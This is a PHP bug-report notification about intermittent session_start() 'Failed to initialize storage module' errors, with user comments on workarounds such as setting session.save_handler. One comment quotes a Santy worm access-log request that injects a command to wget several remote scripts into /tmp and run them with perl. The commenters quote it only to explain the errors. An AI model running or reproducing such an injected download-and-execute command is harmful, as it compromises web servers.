ID: 25876 Comment by: jarratt at dotpixel dot net Reported By: golden at riscom dot com Status: Assigned Bug Type: Session related Operating System: freebsd 4.8 PHP Version: 4.3.9-4.3.10 Assigned To: sas New Comment:
Hi, We also seem to be experience this intermittent problem with a newly compiled version of PHP 5.0.3 Fatal error: session_start() [function.session-start]: Failed to initialize storage module: user (path: ) in ... Any ideas, i have two versions of php on my fedora 1 box if i switch to php 4.3.8 Fedora rpm version i have no issues. In the php.ini has session.save_handler = files set any suggestions? Thanks Previous Comments: ------------------------------------------------------------------------ [2004-12-30 02:18:57] aussie_jadu at hotmail dot com We're experiencing the same error, with php 4.3.10 running on Redhat 7.3 with apache 1.3.31. PHP Fatal error: session_start(): Failed to initialize storage module: user ------------------------------------------------------------------------ [2004-12-28 21:27:20] mak123 at poczta dot onet dot pl I found many log lines with: ...&PHPSESSID=http://www.visualcoders.net/spy.gif?..... or other session variables like osCsid, IDP, sess_id - and there is huge correlation between number of such attacks and time when sessions hang with 'Failed to initialize...' error. After 50 - 70 such request in 10 - 15 seconds php refused to handle session_start() function. ------------------------------------------------------------------------ [2004-12-28 20:32:21] mak123 at poczta dot onet dot pl I've added 'php_value session.save_handler "files"' line to config file and errors disappeared. ------------------------------------------------------------------------ [2004-12-28 19:21:28] cruiser at ptcruiserclub dot org I'm using php 4.3.10 on Apache2.4.20 on Redhat 9 Lots of this error repeating over and over in apache error_log: "PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0" All the errors correlate to the Santy worm attacks on my oscommerce store in the apache access_log /index.php?cPath=34&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt adding some mod_rewrite rules in httpd.conf to redirect the worm away stopped the errors. ------------------------------------------------------------------------ [2004-12-28 12:33:28] mbi at euro-ip dot net After the recompile of PHP 4.3.10 with a session.c of 4.3.9, the problems seem to have disapeared. It's quite difficult to be sure, because the problem only occured once in a while (and it all took of about a week after the initial upgrade). Some other people, using our services, affected by the problems, tell me that they are gone by now (without setting a session handler via ini_set). I'm quite aware there are some unfixed bugs in the session.c of 4.3.9, but the other way was quite unacceptable for production usage. Maybe somebody with better knowledge of the code should take a look at the changes between 4.3.9 and 4.3.10 in "session.c". We're using Apache 1.3.33 with PHP 4.3.10, mod_ssl 2.8.22 on FreeBSD 4.10-RELEASE-p3. The current configuration has been rock-solid for months and besides some minor upgrades to Apache, PHP and some minor OS fixes, nothing interesting happened to the systems in question. We also noticed this on all of our frontend shared hosting servers. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876 -- Edit this bug report at http://bugs.php.net/?id=25876&edit=1
